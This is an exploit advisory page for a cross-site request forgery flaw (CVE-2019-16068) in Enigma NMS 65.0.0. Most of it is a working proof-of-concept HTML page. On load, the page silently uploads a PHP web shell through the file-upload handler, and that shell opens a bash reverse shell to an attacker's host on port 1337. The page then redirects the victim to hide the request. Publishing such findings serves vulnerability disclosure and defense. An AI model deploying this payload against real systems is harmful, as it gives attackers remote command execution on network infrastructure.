Enigma NMS 65.0.0 Cross-Site Request Forgery

2019.09.12
Credit: Mark Cross
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

#--------------------------------------------------------------------# # Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16068 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application. <html> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495"); xhr.withCredentials = true; var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser'; </script> <body onload="submitRequest();" > </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top